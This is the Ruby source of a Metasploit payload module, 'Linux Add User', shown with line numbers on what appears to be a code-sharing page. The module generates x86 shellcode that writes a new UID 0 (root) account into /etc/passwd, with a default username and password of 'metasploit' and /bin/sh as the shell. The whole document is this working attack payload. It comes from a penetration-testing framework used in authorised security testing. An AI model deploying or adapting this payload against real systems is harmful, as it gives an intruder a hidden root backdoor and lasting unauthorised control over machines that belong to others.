Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
###
7
#
8
# AddUser
9
# -------
10
#
11
# Adds a UID 0 user to /etc/passwd.
12
#
13
###
14
module MetasploitModule
15

16
  CachedSize = 97
17

18
  include Msf::Payload::Single
19
  include Msf::Payload::Linux
20

21
  def initialize(info = {})
22
    super(merge_info(info,
23
      'Name'          => 'Linux Add User',
24
      'Description'   => 'Create a new user with UID 0',
25
      'Author'        => [ 'skape', 'vlad902', 'spoonm' ],
26
      'License'       => MSF_LICENSE,
27
      'Platform'      => 'linux',
28
      'Arch'          => ARCH_X86,
29
      'Privileged'    => true))
30

31
    # Register adduser options
32
    register_options(
33
      [
34
        OptString.new('USER',  [ true,  "The username to create",     "metasploit" ]),
35
        OptString.new('PASS',  [ true,  "The password for this user", "metasploit" ]),
36
        OptString.new('SHELL', [ false, "The shell for this user",    "/bin/sh"    ]),
37
      ])
38
  end
39

40
  #
41
  # Dynamically builds the adduser payload based on the user's options.
42
  #
43
  def generate(opts={})
44
    user    = datastore['USER']  || 'metasploit'
45
    pass    = datastore['PASS']  || 'metasploit'
46
    shell   = datastore['SHELL'] || '/bin/sh'
47
    str     = "#{user}:#{pass.crypt('Az')}:0:0::/:#{shell}\n"
48
    payload =
49
      "\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58" +
50
      "\x31\xc9\x51\x68\x73\x73\x77\x64\x68\x2f\x2f\x70" +
51
      "\x61\x68\x2f\x65\x74\x63\x89\xe3\x41\xb5\x04\xcd" +
52
      "\x80\x93" + Rex::Arch::X86.call(str.length) + str +
53
      "\x59\x8b\x51\xfc\x6a\x04\x58\xcd\x80\x6a\x01\x58" +
54
      "\xcd\x80"
55
  end
56
end
57

58